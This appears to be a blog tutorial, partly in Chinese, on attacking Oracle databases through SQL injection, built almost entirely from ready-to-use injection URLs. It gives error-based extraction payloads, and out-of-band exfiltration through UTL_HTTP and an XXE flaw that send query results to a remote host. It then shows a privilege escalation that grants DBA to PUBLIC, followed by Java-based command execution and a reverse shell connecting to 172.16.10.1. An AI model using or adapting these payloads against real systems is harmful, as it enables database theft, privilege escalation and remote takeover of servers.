Several ways of error injection
0x1 utl_inaddr.get_host_name
This method does not require any permissions in Oracle 8g, 9g, 10g , but in Oracle 11g and later versions, the official enhanced access control permissions, so after 11g to use this method for error injection, the current database user must have network access.
| http://www.iswin.org/oracle.jsp?name=' and 1=utl_inaddr.get_host_name((select user from dual))-- |
0x2 ctxsys.drithsx.sn
| http://www.iswin.org/oracle.jsp?name=' and 1=ctxsys.drithsx.sn(1,(select user from dual))-- |
0x3 XMLType
When using this XMLType to report errors, many people don't know why they use chr(60). You can see through ascii query, 60:<,58:':',62:'>', check the relevant api, It is found that xmltype must end with <beginning> when parsing, here: the colon is essential, as for why it is a colon, I have not found it, and it should be noted that if the returned data has spaces, It will be automatically truncated, resulting in incomplete data. There is a replace function to replace it with other non-empty characters.
| http://www.iswin.org/oracle.jsp?name=' and (select upper(XMLType(chr(60)||chr(58)||(select user from dual)||chr(62))) from dual) is not null-- |
0x4 dbms_xdb_version.checkin
| http://www.iswin.org/oracle.jsp?name=' and (select dbms_xdb_version.checkin((select user from dual)) from dual) is not null-- |
0x5 dbms_xdb_version.makeversioned
| http://www.iswin.org/oracle.jsp?name=' and (select dbms_xdb_version.makeversioned((select user from dual)) from dual) is not null-- |
0x6 dbms_xdb_version.uncheckout
| http://www.iswin.org/oracle.jsp?name=' and (select dbms_xdb_version.uncheckout((select user from dual)) from dual) is not null-- |
0x7 dbms_utility.sqlid_to_sqlhash
| http://www.iswin.org/oracle.jsp?name=' and (SELECT dbms_utility.sqlid_to_sqlhash((select user from dual)) from dual) is not null-- |
Use of UTL_HTTP.request
Through utl_http.request, we can send the result of the query to the remote server, which is very useful when encountering blind injection. To use this method, the user needs to have utl_http access to the network.
UTL_INADDR.GET_HOST_ADDRESS&SYS.DBMS_LDAP.INIT
In many cases, the data server is separated from the site and library, and it may not be able to go out to the Internet. Sometimes DNS requests may be allowed, so this method can work in certain circumstances.
| http://www.iswin.org/oracle.jsp?name=' and (UTL_HTTP.request('http://www.iswin.org:80/'||(select banner from sys.v_$version where rownum=1))=1—
|
Oracle XXE(CVE-2014-6577)
Affected versions: 11.2.0.3, 11.2.0.4, 12.1.0.1 and 12.1.0.2
The use effect of Oracle's XXE here is similar to that of UTL_http, which is to transmit data to the remote server. However, since the extractvalue() function can be used by all database users, there is no problem of authority, so when the low authority is used This is a good approach when you don't have UTL_http access.
| http://www.iswin.org/oracle.jsp?name=' and (select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://172.16.10.1:8080/'||(SELECT user from dual)||'"> %remote;]>'),'/l') from dual) is not null |
Oracle Privilege Escalation Vulnerability
GET_DOMAIN_INDEX_TABLES function injection vulnerability
Versions Affected: Oracle 8.1.7.4, 9.2.0.1 - 9.2.0.7, 10.1.0.2 - 10.1.0.4, 10.2.0.1-10.2.0.2
The cause of the vulnerability is that the parameters of the function are injected, and the owner of the function is sys, so any sql can be executed through injection. The execution permission of the function is public, so as long as an oracle injection point is encountered and this vulnerability exists Yes, basically, it can be elevated to the highest privilege.
Privilege escalation
| http://www.iswin.org/oracle.jsp?name=' and (SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS _OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACT;BEGIN EXECUTE IMMEDIATE ''''grant dba to public'''';END;'';END;--','SYS',0,'1',0)) is not null-- |
权限提升之后就可以做很多事了,因为Oracle可以执行JAVA代码,所以在提升权限后具体怎么操作,就看各自的JAVA水平了。
这里给出几种常见的利用方式。
命令执行
创建JAVA代码
|
1
2
|
http:
//www.iswin.org/oracle.jsp?name=' and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT" .PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace and compile java source named "Command" as import java.io.*;public class Command{public static String exec(String cmd) throws Exception{String sb="";BufferedInputStream in = new BufferedInputStream(Runtime.getRuntime().exec(cmd).getInputStream());BufferedReader inBr = new BufferedReader(new InputStreamReader(in));String lineStr;while ((lineStr = inBr.readLine()) != null)sb+=lineStr+"
";inBr.close();in.close();
return
sb;}}
''
''
;END;
''
;END;--
','
SYS
',0,'
1
',
0
) from dual) is not
null
|
赋予JAVA执行权限
|
1
|
http:
//www.iswin.org/oracle.jsp?name=' and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual) is not null--
|
创建函数
|
1
|
http:
//www.iswin.org/oracle.jsp?name=' and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT" .PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace function cmd(p_cmd in varchar2) return varchar2 as language java name ''''''''Command.exec(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual) is not null--
|
赋予函数执行权限
|
1
|
http:
//www.iswin.org/oracle.jsp?name=' and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT" .PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on cmd to public'''';END;'';END;--','SYS',0,'1',0) from dual) is not null--
|
执行命令
| http://www.iswin.org/oracle.jsp?name=' and (select sys.cmd('cmd.exe /c whoami') from dual) is not null-- |
反弹SHELL
创建JAVA代码
当执行命令没有什么太大的帮助时,我们可以反弹一个交互式的shell,这样会方便很多。
|
1
|
http:
//www.iswin.org/oracle.jsp?name=' and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace and compile java source named "shell" as import java.io.*;import java.net.*;public class shell{public static void run() throws Exception {Socket s = new Socket("172.16.10.1", 80);Process p = Runtime.getRuntime().exec("cmd.exe");new T(p.getInputStream(), s.getOutputStream()).start();new T(p.getErrorStream(), s.getOutputStream()).start();new T(s.getInputStream(), p.getOutputStream()).start();}static class T extends Thread {private InputStream i;private OutputStream u;public T(InputStream in, OutputStream out) {this.u = out;this.i = in;}public void run() {BufferedReader n = new BufferedReader(new InputStreamReader(i));BufferedWriter w = new BufferedWriter(new OutputStreamWriter(u));char f[] = new char[8192];int l;try {while ((l = n.read(f, 0, f.length)) > 0) {w.write(f, 0, l);w.flush();}} catch (IOException e) {}try {if (n != null)n.close();if (w != null)w.close();} catch (Exception e) {}}}}'''';END;'';END;--','SYS',0,'1',0) from dual) is not null--
|
赋予JAVA执行权限
|
1
|
http:
//www.iswin.org/oracle.jsp?name=' and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.net.SocketPermission'''''''', ''''''''<>'''''''', ''''''''*'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual) is not null--
|
创建函数
|
1
|
http:
//www.iswin.org/oracle.jsp?name=' and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT" .PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace function reversetcp RETURN VARCHAR2 as language java name ''''''''shell.run() return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual) is not null--
|
赋予函数执行权限
|
1
|
http:
//www.iswin.org/oracle.jsp?name=' and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT" .PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on reversetcp to public'''';END;'';END;--','SYS',0,'1',0) from dual) is not null--
|
反弹SHELL
| http://www.iswin.org/oracle.jsp?name=' and (select sys.reversetcp from dual) is not null-- |